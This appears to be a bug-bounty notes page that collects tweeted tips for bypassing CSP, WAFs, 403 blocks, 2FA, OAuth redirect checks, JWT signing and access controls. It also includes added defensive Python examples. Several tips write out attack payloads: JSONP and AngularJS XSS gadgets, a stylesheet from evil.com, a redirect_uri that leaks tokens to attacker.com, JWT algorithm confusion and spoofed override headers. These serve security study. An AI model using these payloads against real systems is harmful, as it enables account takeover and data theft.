# Bypasses

* [It's possible to bypass #CSP with the following : #JSONP: \<script src="https://trustedsite/jsonp?callback=payload"> #AngularJS \<script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> \<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>](https://twitter.com/fasthm00/status/1083371791760818176)
* [Encountered with AWS WAF? Just add "\<!" (without quotes) before your payload and bypass that WAF. :) eg: \<!alert(1) #BugBounty #bugbountytip #bugbountytips](https://twitter.com/neeraj_sonaniya/status/1089235277250387969)
* [If the target is using @Cloudflare, dig in their DNS records and search for the origin's IP address. If you attack the application directly by its IP, Cloudflare's WAF will not be there.](https://twitter.com/rvismit/status/1090495957802860544)
* [Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc.  iFrame with javascript URI payload. Line feeds \[CRLF\] obfuscate it.](https://twitter.com/LooseSecurity/status/1094615936223625216)
* [Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://\*.foo.foo:\* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip](https://twitter.com/ibrahimdraidia/status/1087031047571849217)
* [Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty](https://twitter.com/ameenmaali/status/1159558019551657984)
* [When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.](https://twitter.com/hakluke/status/1183314554874318849)
* CSP Bypass, script-src 'self' data: - <https://twitter.com/404death/status/1191222237782659072>
* [Want to bypass a file extension restriction? Try HTTP Parameter Pollution on the filename parameter.](https://twitter.com/Hxzeroone/status/1250342399068352512)

![](/files/-M55hqUluNmEHEAZX7-U)
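
For the decimal-ID rounding tip above, an added example (not from any of the tweets) contrasting a check that compares the raw string before rounding with one that canonicalizes the identifier first; `PROTECTED_IDS` and the two lookup functions are constructed for illustration:

```python
import re

# Canonical non-negative decimal integer only: no sign, no leading zeros, no
# fraction, no exponent, no surrounding whitespace.
_CANONICAL_ID = re.compile(r"0|[1-9][0-9]*")

PROTECTED_IDS = {"1"}  # constructed: the admin record that must stay unreachable


def parse_resource_id(raw) -> int:
    """Return the integer an identifier denotes, or raise. Coercion such as
    "0.9" -> 1 is refused so the value checked and the value used agree."""
    if isinstance(raw, bool):                      # bool is an int subclass
        raise ValueError("id must not be a boolean")
    if isinstance(raw, int):
        if raw < 0:
            raise ValueError("id must be non-negative")
        return raw
    if isinstance(raw, str) and _CANONICAL_ID.fullmatch(raw):
        return int(raw)
    raise ValueError(f"id is not a canonical integer: {raw!r}")


def vulnerable_lookup(raw_id: str) -> int:
    """Model of the flow in the tip: the deny-list check compares the raw string,
    then the record is fetched by the rounded numeric value."""
    if raw_id in PROTECTED_IDS:
        raise PermissionError("protected record")
    return round(float(raw_id))                    # "0.9" rounds to 1


def safe_lookup(raw_id) -> int:
    """Fixed flow: canonicalize first, then authorize the canonical value."""
    target = parse_resource_id(raw_id)
    if str(target) in PROTECTED_IDS:
        raise PermissionError("protected record")
    return target
```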

* [I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips The last /setup/ endpoint was as the attacker while the first one was as the victim.](https://twitter.com/imhaxormad/status/1252495614161506309)

![](/files/-M5RCttFKFy7E15vZIX_)

* OTP bypass - <https://twitter.com/HackerHumble>
* [Sometimes you find those paths that forward to a login page and you can't see the content inside them. (ex: /path/to/secret --> Google login)](https://twitter.com/_ayoubfathi_/status/1041319555308707841)

{% embed url="<https://twitter.com/HackerHumble/status/1274259490322313219>" %}

CloudFront Bypass -

{% embed url="<https://twitter.com/jzks3c/status/1263041062450475008>" %}

403 Bypass:

![https://twitter.com/RathiArpeet/status/1315593774773334016](/files/-MKB2mTKXUzWIf2bwQKw)

{% embed url="<https://twitter.com/M404ntf/status/1318387981015724034>" %}

{% embed url="<https://twitter.com/remonsec/status/1315301941170249733>" %}

{% embed url="<https://twitter.com/remonsec/status/1316364534156677121>" %}

![https://twitter.com/hackerscrolls/status/1254701239360720900](/files/-MN7SrOGHSCaJbHz4kwY)

**Tools:**

* <https://github.com/lobuhi/byp4xx>
* <https://github.com/Raywando/4xxbypass>
* <https://github.com/sting8k/BurpSuite_403Bypasser>

* [If the “origin” header does not work, try “x-\[org name\]-origin”; the same thing goes for all headers, e.g. x-uber-origin, x-uber-host, etc.](https://twitter.com/m4ll0k/status/1280803080624377857?s=20)

* [#bugbounty I was able to bypass the filter on OAuth by fuzzing with URL-encoded chars; found that the website adds / before %5b when redirecting the token. Example: target/oauth?redirect\_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirects the token to: http://Attacker.com/%5b.target.comrget.com?token=…...](https://twitter.com/ElMrhassel/status/1282661956676182017?s=20)

* [Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [What worked was... \udfff -> � -> ?](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [Therefore... {"redirectUri":"https://attacker\udfff@\[victim\]/"}](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [Equals... Location: https://attacker?@\[victim\]/](https://twitter.com/samwcyo/status/1246997498981494784?s=20)
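
An added example, not from the tweet, showing why a hostname check on the raw string passes the surrogate trick above and how a strict validator catches it; `ALLOWED_REDIRECT_HOSTS`, `SURROGATE_URI` and the lossy transcoding model are constructed assumptions:

```python
from urllib.parse import urlsplit

ALLOWED_REDIRECT_HOSTS = {"victim.example"}  # constructed allow-list

# Constructed value in the shape of the tip: a lone low surrogate after "attacker".
SURROGATE_URI = "https://attacker\udfff@victim.example/cb"


def naive_host_check(uri: str) -> bool:
    """Checks only the hostname parsed from the string exactly as received."""
    return urlsplit(uri).hostname in ALLOWED_REDIRECT_HOSTS


def lossy_transcode(uri: str) -> str:
    """Model of a downstream component that serialises with replacement: the
    unencodable surrogate becomes "?", so everything after it is now the query."""
    return uri.encode("utf-8", errors="replace").decode("ascii")


def transcoded_hostname(uri: str):
    """Hostname the URL has after the lossy step, i.e. where the browser goes."""
    return urlsplit(lossy_transcode(uri)).hostname


def strict_redirect_check(uri: str) -> bool:
    """Refuse anything that could parse differently once re-encoded."""
    if not uri.isascii():            # surrogates, homoglyphs, raw Unicode
        return False
    parts = urlsplit(uri)
    if parts.scheme != "https" or not parts.hostname:
        return False
    if "@" in parts.netloc:          # userinfo is the classic host-confusion lever
        return False
    return parts.hostname in ALLOWED_REDIRECT_HOSTS
```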

* [JWT Token Bypasses #2:](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)

  1. [Capture the JWT token.](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)
  2. [If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting the JWKS URI / mostly it will be the public key from the site's https certificate) (1/2)](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)
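
An added example (not from the tweet) with a minimal stdlib JWT verifier showing the RS256-to-HS256 confusion on the vulnerable side next to the algorithm-pinning fix; `PUBLIC_KEY_PEM` is a constructed placeholder, not a real key, and the RS256 verifier itself is deliberately left out:

```python
import base64
import hashlib
import hmac
import json

# Constructed placeholder for the server's RSA public key; the point is only that
# these bytes are public, so anyone can use them as an HMAC key.
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _hs256_ok(signing_input: bytes, signature: bytes, key: bytes) -> bool:
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint an HS256 token; the test uses it to build the confused token."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_trusting_header(token: str, key: bytes) -> dict:
    """Vulnerable: the token's own header picks the algorithm. Configured with the
    RSA public key, this HMAC-verifies an alg=HS256 token signed with that key."""
    h, p, s = token.split(".")
    alg = json.loads(_b64url_decode(h)).get("alg")
    if alg == "HS256" and _hs256_ok(f"{h}.{p}".encode("ascii"), _b64url_decode(s), key):
        return json.loads(_b64url_decode(p))
    raise ValueError("rejected")  # RS256 branch omitted from this example


VERIFIERS = {"HS256": _hs256_ok}  # production also registers an RS256 verifier here


def verify_pinned(token: str, expected_alg: str, key: bytes) -> dict:
    """Fixed: server configuration, never the token, decides the algorithm."""
    h, p, s = token.split(".")
    if json.loads(_b64url_decode(h)).get("alg") != expected_alg:
        raise ValueError("algorithm not permitted")
    if not VERIFIERS[expected_alg](f"{h}.{p}".encode("ascii"), _b64url_decode(s), key):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(p))
```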

* [Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200 OK Bypass Success! #bugbounty #bugbountytip](https://twitter.com/jae_hak99/status/1285513974931288064?s=20)

* Price Manipulation -

![https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20](/files/-MT9uPDqxkgsk4a7tGKT)

* [{“id”:111} --> 401 Unauthorized {“id”:{“id”:111}} --> 200 OK](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

  [POST /api/get\_profile Content-Type: application/json {“user\_id”:,”user\_id”:}](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

  [GET /api\_v1/messages?user\_id=VICTIM\_ID --> 401](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

  [GET /api\_v1/messages?user\_id=attack\&user\_id=VICTIM --> 200 OK](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)
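
An added example, not from the tweet, of the server-side parsing that closes the duplicated-key and duplicated-parameter gaps shown above: Python's `json.loads` silently keeps the last duplicate key and `dict(parse_qsl(...))` keeps the last repeated parameter, so both are swapped for parsers that refuse ambiguity. All function names are constructed:

```python
import json
from collections import Counter
from urllib.parse import parse_qsl


def _reject_duplicate_keys(pairs):
    """object_pairs_hook: json.loads keeps the last duplicate silently; refuse instead."""
    dupes = [k for k, n in Counter(k for k, _ in pairs).items() if n > 1]
    if dupes:
        raise ValueError(f"duplicate JSON keys: {dupes}")
    return dict(pairs)


def loads_strict(text: str):
    """json.loads that fails on duplicate keys at any nesting level."""
    return json.loads(text, object_pairs_hook=_reject_duplicate_keys)


def user_id_from_json(body: str) -> int:
    """Authorization must look at the same value the data layer will use, so the
    id has to be a plain integer: no nested object, no string, no bool."""
    uid = loads_strict(body).get("id")
    if isinstance(uid, bool) or not isinstance(uid, int):
        raise ValueError(f"id must be a plain integer, got {uid!r}")
    return uid


def single_valued_query(query: str) -> dict:
    """Refuse repeated parameters instead of letting first-wins and last-wins
    disagree between the auth check and the handler."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in params:
            raise ValueError(f"parameter {key!r} supplied more than once")
        params[key] = value
    return params


def last_wins_query(query: str) -> dict:
    """What a naive dict(parse_qsl(...)) does: the second value replaces the first."""
    return dict(parse_qsl(query, keep_blank_values=True))
```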

* [How to find authentication bypass vulnerabilities. Focus. I Added headers.](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)

  [Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)

  [Request GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)
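
An added example, not from any tweet, covering the header tricks in the x-uber-origin, X-Original-URL and X-Custom-IP-Authorization tips above: a detector run over constructed edge-access records that flags client-supplied override headers and escalates when the response was not a 4xx. The header list and the `VENDOR_OVERRIDE` pattern are assumptions to tune per stack:

```python
import re

# Headers that some frameworks or proxies honour for routing or client identity
# although only trusted infrastructure should ever set them. The list is an
# assumption drawn from the tips above plus common variants; tune it per stack.
OVERRIDE_HEADERS = {
    "x-original-url", "x-rewrite-url", "x-forwarded-host", "x-forwarded-for",
    "x-custom-ip-authorization", "x-originating-ip", "x-remote-ip",
    "x-remote-addr", "x-client-ip", "x-real-ip",
}
# Vendor-prefixed variants in the style of x-uber-origin / x-uber-host.
VENDOR_OVERRIDE = re.compile(r"^x-[a-z0-9]+-(origin|host|url|ip|addr)$")

# Constructed records as captured at the edge, before any trusted proxy appends
# its own X-Forwarded-* headers (otherwise those would be false positives).
SAMPLE_REQUESTS = [
    {"path": "/admin/deleteUser", "status": 403, "headers": {"Host": "app.example"}},
    {"path": "/", "status": 200, "headers": {"X-Original-URL": "/admin/deleteUser"}},
    {"path": "/delete", "status": 302, "headers": {"X-Custom-IP-Authorization": "127.0.0.1"}},
    {"path": "/v1/orders", "status": 403, "headers": {"X-Acme-Origin": "internal"}},
    {"path": "/", "status": 200, "headers": {"Accept": "text/html"}},
]


def override_headers_in(headers: dict) -> list:
    """Return (lower-cased name, value) for every override header present."""
    hits = []
    for name, value in headers.items():
        lname = name.lower()
        if lname in OVERRIDE_HEADERS or VENDOR_OVERRIDE.match(lname):
            hits.append((lname, value))
    return hits


def flag_requests(requests: list) -> list:
    """One finding per request carrying an override header. A non-4xx status
    means the application may have honoured it, which is the case to escalate."""
    findings = []
    for req in requests:
        hits = override_headers_in(req["headers"])
        if hits:
            honoured = req["status"] < 400
            findings.append({"path": req["path"], "status": req["status"],
                             "headers": hits, "severity": "high" if honoured else "low"})
    return findings
```

Wire the same check into the edge proxy as a drop rule once the false-positive rate on real traffic is known.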
* CSP - [So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' and call it from external "\<svg>\<link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec](https://twitter.com/akita_zen/status/1263963555805696004?s=20)
* ![https://twitter.com/iam\_j0ker/status/1303658167205728256?s=20](/files/-MTebHg8OI8BG8zWV1nx)

* [CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [But I can raise it again to P3 (Iframe Injection) and Triaged.](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [\<iframe src= blocked by CSP](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [Solution:](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [\<iframe srcdoc=](https://twitter.com/xchopath/status/1164775304700628992?s=20)

{% embed url="<https://twitter.com/d4rkhunt3r_/status/1314249917163077634?s=20>" %}

![](/files/-MWEQ0G-MJy1Fs58xRMf)

* [Auth bypass tip:](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [/api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [Found:](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [/api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact: \[ + \] PII info disclosure \[ + \] Sensitive info leak \[ + \] Access admin endpoint #bugbountytips](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)
* [1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips](https://twitter.com/Sm4rty_/status/1368250042436308992?s=20)

